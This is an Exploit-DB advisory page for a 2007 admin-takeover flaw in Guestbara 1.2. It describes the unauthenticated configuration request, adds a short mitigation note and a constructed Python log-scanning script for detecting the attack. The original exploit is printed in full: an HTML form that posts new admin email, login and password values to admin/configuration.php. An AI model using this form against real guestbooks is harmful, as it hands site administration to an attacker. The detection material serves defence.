vendor: Guestbara
by: Kacper
Product Name: Guestbara
Affected Version From: <= 1.2
Affected Version To: <= 1.2
Patch Exists: NO
2007

Guestbara <= 1.2 Change admin login & password exploit

This exploit allows an attacker to change the admin login and password in Guestbara 1.2 and earlier. The attacker can modify the admin email, admin name, and admin password through a form submission: a POST request to admin/configuration.php, with action=saveconfig&zapis=ok in the query string, carrying the admin_mail, login, and pass parameters.

Mitigation:

To mitigate this vulnerability, it is recommended to update to a patched version of Guestbara or implement strong access controls and secure password policies.
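
Detection: the request described above leaves a recognizable entry in the web server access log. The following Python script is an added example, not part of the original advisory or of Guestbara; it lists every POST to admin/configuration.php with action=saveconfig and marks those whose Referer is missing or points to another host. It assumes Apache/nginx combined log format; the host name guestbook.example, the /gb/ install path and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Combined Log Format: ip - user [time] "METHOD target PROTO" status size "referer" "agent"
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)"'
)

# Constructed sample lines (documentation IP ranges, assumed /gb/ install path).
SAMPLE_LOG = [
    '198.51.100.7 - - [18/Mar/2007:10:02:11 +0000] "GET /gb/index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [18/Mar/2007:10:05:40 +0000] "POST /gb/admin/configuration.php?action=saveconfig&zapis=ok HTTP/1.1" 200 812 "http://guestbook.example/gb/admin/configuration.php" "Mozilla/5.0"',
    '203.0.113.44 - - [18/Mar/2007:10:09:03 +0000] "POST /gb/admin/configuration.php?action=saveconfig&zapis=ok HTTP/1.1" 200 812 "-" "Mozilla/5.0"',
    '203.0.113.44 - - [18/Mar/2007:10:09:30 +0000] "GET /gb/admin/configuration.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]

def find_saveconfig_posts(lines, site_host):
    """Return one dict per POST to admin/configuration.php?action=saveconfig."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m["method"] != "POST":
            continue
        url = urlsplit(m["target"])
        if not url.path.lower().endswith("/admin/configuration.php"):
            continue
        if "saveconfig" not in parse_qs(url.query).get("action", []):
            continue
        ref_host = urlsplit(m["referer"]).hostname  # None for "-" or empty
        hits.append({
            "ip": m["ip"],
            "time": m["time"],
            "status": int(m["status"]),
            # A form hosted outside the guestbook sends a foreign or missing Referer.
            "offsite_referer": ref_host != site_host,
        })
    return hits

if __name__ == "__main__":
    for hit in find_saveconfig_posts(SAMPLE_LOG, "guestbook.example"):
        print(hit)
```

Every hit is a change to the admin account settings and is worth matching against known administrator activity; hits with offsite_referer set deserve attention first.
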
Source

Exploit-DB raw data:

<html>
<title>Guestbara &lt;= 1.2 Change admin login & password exploit by Kacper</title>
<table border=0 cellspacing=0 cellpadding=0 align='center'>

<form method='post' action='http://127.0.0.1/guestbook_path/admin/configuration.php?action=saveconfig&zapis=ok'>

<tr><td width=200>Admin Email</td><td><input type='text' name='admin_mail' class='textfield' value=''></td></tr>
<tr><td width=200>Admin Name</td><td><input type='text' name='login' class='textfield' value=''></td></tr>
<tr><td width=200>Admin Pass</td><td><input type='password' name='pass' class='textfield' value=''></td></tr>
<tr><td  colspan=2 align=center>
  <p>
    <input type='submit' name='submit' value='Zachowaj'>
  </p>
  <p>by Kacper  </p>
  <p>for</p>
  <p><a href="http://www.rahim.webd.pl/" target="_blank">DEVIL TEAM </a></p></td></tr>
</form></table>
<p>&nbsp;</p>
<p align="center">script download: http://www.hotscripts.pl/produkt-3051.html</p>
<p align="center">Greetz @ll DEVIL TEAM </p>
</html>

# milw0rm.com [2007-03-18]